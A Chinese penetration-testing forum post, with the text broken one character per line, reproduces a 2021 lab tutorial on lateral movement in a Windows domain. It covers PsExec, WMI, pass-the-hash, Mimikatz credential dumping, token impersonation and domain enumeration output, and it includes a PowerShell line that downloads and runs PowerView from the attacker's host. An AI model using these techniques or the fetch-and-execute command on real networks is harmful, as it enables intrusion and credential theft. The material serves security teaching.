论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
渗透测试
[22265] 2021-08-18_Windows域横向渗透
文档创建者:
s7ckTeam
浏览次数:
1
最后更新:
2025-01-18
渗透测试
1 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-58
6万
主题
-6万
回帖
-58
积分
管理员
积分
-58
发消息
2021-08-18_Windows域横向渗透
W
i
n
d
o
w
s
域
横
向
渗
透
L
e
m
o
n
S
e
c
2
0
2
1
-
0
8
-
1
8
环
境
拓
扑
环
境
拓
扑
我
们
的
目
的
是
获
取
我
们
的
目
的
是
获
取
r
e
d
h
o
o
k
.
D
A
域
的
一
个
可
用
的
账
户
,
当
前
攻
击
者
已
在
公
司
网
络
内
,
但
并
未
在
同
一
个
子
网
。
域
的
一
个
可
用
的
账
户
,
当
前
攻
击
者
已
在
公
司
网
络
内
,
但
并
未
在
同
一
个
子
网
。
C
o
m
p
r
o
m
i
s
i
n
g
C
l
i
e
n
t
1
假
设
我
们
已
经
获
取
到
了
C
l
i
e
n
t
1
的
登
陆
凭
据
,
如
果
网
络
足
够
大
,
你
可
以
发
现
存
储
在
某
处
网
络
共
享
上
面
的
其
他
凭
据
(
通
过
批
量
的
脚
本
:
v
b
s
,
p
s
1
,
.
n
e
t
等
等
)
。
关
于
怎
么
访
问
网
络
,
你
可
以
使
用
C
o
b
a
l
t
S
t
r
i
k
e
框
架
。
我
们
可
以
这
样
做
:
我
们
可
以
通
过
批
量
的
脚
本
快
速
的
获
得
N
E
T
B
I
O
S
的
信
息
。
在
w
i
n
上
,
可
以
用
命
令
n
b
t
s
t
a
t
-
A
I
P
获
得
相
同
的
信
息
,
可
以
看
到
机
器
名
是
W
I
N
7
-
E
N
T
-
C
L
I
1
,
属
于
R
E
D
H
O
O
K
域
。
P
s
E
x
e
c
:
使
用
m
s
f
的
p
s
e
x
e
c
可
以
很
容
易
的
获
取
到
一
个
s
h
e
l
l
。
B
O
B
是
一
个
本
地
用
户
,
不
用
指
定
S
M
B
D
o
m
a
i
n
参
数
。
我
们
也
可
以
使
用
I
m
p
a
c
k
e
t
’
s
P
s
E
x
e
c
,
但
p
s
e
x
e
c
的
好
处
是
可
以
传
递
h
a
s
h
。
不
要
忘
了
微
软
自
己
的
P
S
E
X
E
C
有
额
外
的
好
处
,
添
加
一
个
-
s
参
数
会
给
你
一
个
s
y
s
t
e
m
的
s
h
e
l
l
。
W
M
I
一
些
W
M
I
的
选
项
也
可
以
让
你
远
程
系
统
上
执
行
命
令
。
最
值
得
注
意
的
是
W
M
I
C
,
不
仅
可
以
在
远
程
系
统
上
执
行
命
令
,
还
可
以
通
过
内
置
的
命
令
获
取
系
统
的
敏
感
信
息
和
配
置
操
作
系
统
。
最
好
使
用
c
m
d
.
e
x
e
/
c
或
p
o
w
e
r
s
h
e
l
l
-
e
x
e
c
b
y
p
a
s
s
-
c
o
m
m
a
n
d
。
我
们
使
用
I
m
p
a
c
k
e
t
W
m
i
E
x
e
c
可
以
获
取
到
一
个
半
交
互
式
的
s
h
e
l
l
,
执
行
命
令
并
获
取
输
出
。
最
后
使
用
P
o
w
e
r
S
p
l
o
i
t
的
I
n
v
o
k
e
-
W
m
i
C
o
m
m
a
n
d
命
令
。
P
a
s
s
-
T
h
e
-
H
a
s
h
,
W
C
E
&
M
i
m
i
k
a
t
z
:
有
时
候
你
只
能
获
取
到
N
T
L
M
的
h
a
s
h
值
,
可
以
使
用
m
s
f
的
p
s
e
x
e
c
或
W
C
E
或
M
i
m
i
k
a
t
z
。
缺
点
是
W
C
E
可
能
会
被
发
现
,
而
m
i
m
i
k
a
t
z
是
直
接
加
载
内
存
。
S
m
a
s
h
-
A
n
d
-
G
r
a
b
M
e
t
a
s
p
l
o
i
t
(
M
i
m
i
k
a
t
z
&
h
a
s
h
d
u
m
p
)
:
使
用
M
i
m
i
k
a
t
z
为
具
有
活
动
会
话
的
用
户
获
取
纯
文
本
凭
据
,
使
用
h
a
s
h
d
u
m
p
获
取
当
前
未
登
录
的
本
地
帐
户
的
哈
希
值
。
S
e
c
r
e
t
s
d
u
m
p
&
I
n
v
o
k
e
-
M
i
m
i
k
a
t
z
:
也
可
以
使
用
I
m
p
a
c
k
e
t
’
s
S
e
c
r
e
t
s
D
u
m
p
和
P
o
w
e
r
s
p
l
o
i
t
’
s
I
n
v
o
k
e
-
M
i
m
i
k
a
t
z
来
获
取
。
m
i
m
i
k
a
t
z
的
脚
本
托
管
在
攻
击
者
的
服
务
器
上
。
可
能
还
有
其
他
技
术
,
但
是
以
上
是
最
经
典
的
。
I
m
p
e
r
s
o
n
a
t
i
o
n
:
现
在
我
们
有
了
r
e
d
h
o
o
k
域
里
的
一
台
机
器
并
且
能
连
接
到
不
同
的
子
网
中
,
现
在
开
始
做
一
个
信
息
收
集
。
要
查
询
域
的
信
息
,
需
要
有
一
个
域
用
户
,
当
前
的
b
o
b
用
户
并
不
是
域
用
户
或
s
y
s
t
e
m
权
限
,
但
是
我
们
可
以
通
过
N
t
Q
u
e
r
y
S
y
s
t
e
m
I
n
f
o
r
m
a
t
i
o
n
来
发
现
其
他
用
户
的
t
o
k
e
n
,
进
而
模
拟
他
们
登
陆
。
m
e
t
e
r
p
r
e
t
e
r
有
这
个
插
件
,
使
这
个
过
程
非
常
简
单
。
也
可
以
使
用
i
n
c
o
g
n
i
t
o
(
)
下
载
地
址
:
h
t
t
p
s
:
/
/
l
a
b
s
.
m
w
r
i
n
f
o
s
e
c
u
r
i
t
y
.
c
o
m
/
b
l
o
g
/
2
0
1
2
/
0
7
/
1
8
/
i
n
c
o
g
n
i
t
o
-
v
2
-
0
-
r
e
l
e
a
s
e
d
/
R
e
c
o
n
n
a
i
s
s
a
n
c
e
域
侦
察
:
域
侦
察
:
现
在
我
们
有
了
一
个
域
用
户
,
我
们
需
要
尽
快
扩
大
战
果
。
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
w
h
o
a
m
i
r
e
d
h
o
o
k
a
s
e
n
a
t
h
.
w
a
i
t
e
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
h
o
s
t
n
a
m
e
W
I
N
7
-
E
n
t
-
C
L
I
1
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
i
p
c
o
n
f
i
g
W
i
n
d
o
w
s
I
P
C
o
n
f
i
g
u
r
a
t
i
o
n
E
t
h
e
r
n
e
t
a
d
a
p
t
e
r
L
o
c
a
l
A
r
e
a
C
o
n
n
e
c
t
i
o
n
2
:
C
o
n
n
e
c
t
i
o
n
-
s
p
e
c
i
f
i
c
D
N
S
S
u
f
f
i
x
.
:
l
o
c
a
l
d
o
m
a
i
n
L
i
n
k
-
l
o
c
a
l
I
P
v
6
A
d
d
r
e
s
s
.
.
.
.
.
:
f
e
8
0
:
:
a
1
b
a
:
a
1
a
b
:
1
7
0
c
:
7
9
1
6
%
1
7
I
P
v
4
A
d
d
r
e
s
s
.
.
.
.
.
.
.
.
.
.
.
:
1
0
.
0
.
0
.
1
2
9
#
A
t
t
a
c
k
e
r
'
s
s
u
b
n
e
t
S
u
b
n
e
t
M
a
s
k
.
.
.
.
.
.
.
.
.
.
.
:
2
5
5
.
2
5
5
.
2
5
5
.
0
D
e
f
a
u
l
t
G
a
t
e
w
a
y
.
.
.
.
.
.
.
.
.
:
E
t
h
e
r
n
e
t
a
d
a
p
t
e
r
B
l
u
e
t
o
o
t
h
N
e
t
w
o
r
k
C
o
n
n
e
c
t
i
o
n
:
M
e
d
i
a
S
t
a
t
e
.
.
.
.
.
.
.
.
.
.
.
:
M
e
d
i
a
d
i
s
c
o
n
n
e
c
t
e
d
C
o
n
n
e
c
t
i
o
n
-
s
p
e
c
i
f
i
c
D
N
S
S
u
f
f
i
x
.
:
E
t
h
e
r
n
e
t
a
d
a
p
t
e
r
L
o
c
a
l
A
r
e
a
C
o
n
n
e
c
t
i
o
n
:
C
o
n
n
e
c
t
i
o
n
-
s
p
e
c
i
f
i
c
D
N
S
S
u
f
f
i
x
.
:
L
i
n
k
-
l
o
c
a
l
I
P
v
6
A
d
d
r
e
s
s
.
.
.
.
.
:
f
e
8
0
:
:
5
d
d
c
:
1
e
6
:
1
7
e
9
:
9
e
1
5
%
1
1
I
P
v
4
A
d
d
r
e
s
s
.
.
.
.
.
.
.
.
.
.
.
:
1
0
.
1
.
1
.
2
#
R
E
D
H
O
O
K
s
u
b
n
e
t
S
u
b
n
e
t
M
a
s
k
.
.
.
.
.
.
.
.
.
.
.
:
2
5
5
.
2
5
5
.
2
5
5
.
0
D
e
f
a
u
l
t
G
a
t
e
w
a
y
.
.
.
.
.
.
.
.
.
:
1
0
.
1
.
1
.
1
T
u
n
n
e
l
a
d
a
p
t
e
r
i
s
a
t
a
p
.
{
8
D
0
4
6
6
B
5
-
1
F
8
8
-
4
8
0
C
-
A
4
2
D
-
4
9
A
8
7
1
6
3
5
C
9
A
}
:
M
e
d
i
a
S
t
a
t
e
.
.
.
.
.
.
.
.
.
.
.
:
M
e
d
i
a
d
i
s
c
o
n
n
e
c
t
e
d
C
o
n
n
e
c
t
i
o
n
-
s
p
e
c
i
f
i
c
D
N
S
S
u
f
f
i
x
.
:
T
u
n
n
e
l
a
d
a
p
t
e
r
i
s
a
t
a
p
.
l
o
c
a
l
d
o
m
a
i
n
:
M
e
d
i
a
S
t
a
t
e
.
.
.
.
.
.
.
.
.
.
.
:
M
e
d
i
a
d
i
s
c
o
n
n
e
c
t
e
d
C
o
n
n
e
c
t
i
o
n
-
s
p
e
c
i
f
i
c
D
N
S
S
u
f
f
i
x
.
:
l
o
c
a
l
d
o
m
a
i
n
T
u
n
n
e
l
a
d
a
p
t
e
r
i
s
a
t
a
p
.
{
5
C
B
B
E
0
1
5
-
1
E
1
C
-
4
9
2
6
-
8
0
2
5
-
E
B
B
5
9
E
4
7
0
1
8
6
}
:
M
e
d
i
a
S
t
a
t
e
.
.
.
.
.
.
.
.
.
.
.
:
M
e
d
i
a
d
i
s
c
o
n
n
e
c
t
e
d
C
o
n
n
e
c
t
i
o
n
-
s
p
e
c
i
f
i
c
D
N
S
S
u
f
f
i
x
.
:
#
A
v
e
r
y
s
m
a
l
l
n
e
t
w
o
r
k
,
t
h
r
e
e
h
o
s
t
s
,
i
n
c
l
u
d
i
n
g
t
h
e
o
n
e
w
e
h
a
v
e
j
u
s
t
c
o
m
p
r
o
m
i
s
e
d
.
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
n
e
t
v
i
e
w
S
e
r
v
e
r
N
a
m
e
R
e
m
a
r
k
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
R
E
D
R
U
M
-
D
C
r
e
d
.
d
c
W
I
N
7
-
E
N
T
-
C
L
I
1
W
I
N
7
-
E
N
T
-
C
L
I
2
T
h
e
c
o
m
m
a
n
d
c
o
m
p
l
e
t
e
d
s
u
c
c
e
s
s
f
u
l
l
y
.
#
T
h
e
D
C
t
h
e
u
s
e
r
i
s
a
u
t
h
e
n
t
i
c
a
t
e
d
t
o
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
e
c
h
o
%
l
o
g
o
n
s
e
r
v
e
r
%
R
E
D
R
U
M
-
D
C
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
p
i
n
g
-
n
1
R
E
D
R
U
M
-
D
C
P
i
n
g
i
n
g
r
e
d
r
u
m
-
d
c
.
r
e
d
h
o
o
k
.
l
o
c
a
l
[
1
0
.
1
.
1
.
2
0
0
]
w
i
t
h
3
2
b
y
t
e
s
o
f
d
a
t
a
:
R
e
p
l
y
f
r
o
m
1
0
.
1
.
1
.
2
0
0
:
b
y
t
e
s
=
3
2
t
i
m
e
<
1
m
s
T
T
L
=
1
2
8
P
i
n
g
s
t
a
t
i
s
t
i
c
s
f
o
r
1
0
.
1
.
1
.
2
0
0
:
P
i
n
g
s
t
a
t
i
s
t
i
c
s
f
o
r
1
0
.
1
.
1
.
2
0
0
:
P
a
c
k
e
t
s
:
S
e
n
t
=
1
,
R
e
c
e
i
v
e
d
=
1
,
L
o
s
t
=
0
(
0
%
l
o
s
s
)
,
A
p
p
r
o
x
i
m
a
t
e
r
o
u
n
d
t
r
i
p
t
i
m
e
s
i
n
m
i
l
l
i
-
s
e
c
o
n
d
s
:
M
i
n
i
m
u
m
=
0
m
s
,
M
a
x
i
m
u
m
=
0
m
s
,
A
v
e
r
a
g
e
=
0
m
s
#
L
i
s
t
l
o
c
a
l
u
s
e
r
s
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
n
e
t
u
s
e
r
U
s
e
r
a
c
c
o
u
n
t
s
f
o
r
W
I
N
7
-
E
N
T
-
C
L
I
1
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
A
d
m
i
n
i
s
t
r
a
t
o
r
b
o
b
G
u
e
s
t
T
e
m
p
l
a
t
e
A
d
m
i
n
T
h
e
c
o
m
m
a
n
d
c
o
m
p
l
e
t
e
d
s
u
c
c
e
s
s
f
u
l
l
y
.
#
L
i
s
t
R
E
D
H
O
O
K
d
o
m
a
i
n
u
s
e
r
s
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
n
e
t
u
s
e
r
/
d
o
m
a
i
n
T
h
e
r
e
q
u
e
s
t
w
i
l
l
b
e
p
r
o
c
e
s
s
e
d
a
t
a
d
o
m
a
i
n
c
o
n
t
r
o
l
l
e
r
f
o
r
d
o
m
a
i
n
R
e
d
H
o
o
k
.
l
o
c
a
l
.
U
s
e
r
a
c
c
o
u
n
t
s
f
o
r
R
e
d
r
u
m
-
D
C
.
R
e
d
H
o
o
k
.
l
o
c
a
l
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
A
d
m
i
n
i
s
t
r
a
t
o
r
a
s
e
n
a
t
h
.
w
a
i
t
e
G
u
e
s
t
j
o
h
n
.
s
m
i
t
h
k
r
b
t
g
t
r
e
d
h
o
o
k
.
D
A
r
o
b
e
r
t
.
s
u
y
d
a
m
w
i
l
b
u
r
.
w
h
a
t
e
l
e
y
T
h
e
c
o
m
m
a
n
d
c
o
m
p
l
e
t
e
d
s
u
c
c
e
s
s
f
u
l
l
y
.
#
P
o
w
e
r
S
p
l
o
i
t
=
>
I
n
v
o
k
e
-
E
n
u
m
e
r
a
t
e
L
o
c
a
l
A
d
m
i
n
:
F
i
n
d
a
l
l
u
s
e
r
s
w
h
o
a
r
e
l
o
c
a
l
A
d
m
i
n
i
s
t
r
a
t
o
r
s
o
n
a
b
o
x
i
n
t
h
e
n
e
t
w
o
r
k
.
C
:
W
i
n
d
o
w
s
S
y
s
t
e
m
3
2
>
p
o
w
e
r
s
h
e
l
l
-
e
x
e
c
b
y
p
a
s
s
-
c
o
m
m
a
n
d
"
I
E
X
(
N
e
w
-
O
b
j
e
c
t
S
y
s
t
e
m
.
N
e
t
.
W
e
b
c
l
i
e
n
t
)
.
D
o
w
n
l
o
a
d
S
t
r
i
n
g
(
'
h
t
t
p
:
/
/
1
0
.
0
.
0
.
1
2
8
/
P
o
w
e
r
V
i
e
w
.
p
s
1
'
)
;
I
n
v
o
k
e
-
E
n
u
m
e
r
a
t
e
L
o
c
a
l
A
d
m
i
n
"
S
e
r
v
e
r
:
R
e
d
r
u
m
-
D
C
.
R
e
d
H
o
o
k
.
l
o
c
a
l
A
c
c
o
u
n
t
N
a
m
e
:
R
e
d
H
o
o
k
.
l
o
c
a
l
/
A
d
m
i
n
i
s
t
r
a
t
o
r
#
B
e
c
a
r
e
f
u
l
,
A
d
m
i
n
i
s
t
r
a
t
o
r
i
s
a
d
o
m
a
i
n
u
s
e
r
S
I
D
:
S
-
1
-
5
-
2
1
-
1
2
9
7
0
7
5
1
1
-
1
1
5
8
4
3
2
2
7
7
-
3
8
1
8
3
8
3
0
9
2
-
5
0
0
i
n
t
h
i
s
c
a
s
e
,
n
o
t
a
l
o
c
a
l
u
s
e
r
!
D
i
s
a
b
l
e
d
:
F
a
l
s
e
I
s
G
r
o
u
p
:
F
a
l
s
e
I
s
D
o
m
a
i
n
:
T
r
u
e
L
a
s
t
L
o
g
i
n
:
2
8
/
0
1
/
2
0
1
6
2
1
:
3
8
:
2
2
S
e
r
v
e
r
:
R
e
d
r
u
m
-
D
C
.
R
e
d
H
o
o
k
.
l
o
c
a
l
A
c
c
o
u
n
t
N
a
m
e
:
R
e
d
H
o
o
k
.
l
o
c
a
l
/
E
n
t
e
r
p
r
i
s
e
A
d
m
i
n
s
S
I
D
:
S
-
1
-
5
-
2
1
-
1
2
9
7
0
7
5
1
1
-
1
1
5
8
4
3
2
2
7
7
-
3
8
1
8
3
8
3
0
9
2
-
5
1
9
D
i
s
a
b
l
e
d
:
F
a
l
s
e
I
s
G
r
o
u
p
:
T
r
u
e
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
渗透测试